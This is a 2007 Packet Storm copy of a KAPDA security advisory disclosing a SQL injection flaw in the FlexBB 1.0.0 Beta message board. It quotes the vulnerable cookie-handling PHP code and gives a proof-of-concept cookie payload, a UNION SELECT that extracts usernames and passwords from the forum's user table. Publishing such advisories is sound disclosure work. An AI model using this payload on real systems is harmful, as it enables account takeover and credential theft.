advisory-481.txt

2007-03-29T00:00:00
ID PACKETSTORM:55443
Type packetstorm
Reporter trueend5
Modified 2007-03-29T00:00:00

Description

                                        
                                            `  
KAPDA New advisory  
Vendor: http://www.flexbb.net  
Vulnerable Version: 1.0.0 10005 Beta Release 1  
Bug: SQL Injection  
Exploitation: Remote with browser  
  
Description:  
--------------------  
Flexbb is a freely available PHP-based message board  
program that uses a MySQL database.  
  
Vulnerability:  
--------------------  
Sql Injection:  
The software does not properly validate user-supplied  
input that may allow a remote user to launch Sql  
injection attacks.  
There are multiple Input Validation errors, for  
example:  
// Code Snippet  
// Includes/Start.php  
// Lines #190-197  
if($_COOKIE['flexbb_lang_id'] == "")  
{  
$lang_id = $config['default_lang_id'];  
}  
else  
{  
$lang_id = $_COOKIE['flexbb_lang_id']; //--->Input  
Validation Error  
}  
  
POC:  
--------------------  
Condition: Magic quotes GPC = Off  
GET: http://example.com/flexbb/index.php?debug=1  
Cookie Name = flexbb_lang_id  
Cookie Value = none' UNION SELECT 'en',`username`,  
`password`,1,1 FROM `flexbb_users` WHERE `group` = '4  
  
original Advisory:  
--------------------  
http://www.kapda.ir/advisory-481.html  
  
Solution:  
--------------------  
No response from vendor, there is no solution at the  
time of this entry.  
  
Credit :  
--------------------  
Discovered & released by trueend5 (trueend5 kapda ir)  
Security Science Researchers Institute Of Iran  
[http://www.KAPDA.ir]  
  
  
  
  
____________________________________________________________________________________  
TV dinner still cooling?   
Check out "Tonight's Picks" on Yahoo! TV.  
http://tv.yahoo.com/  
`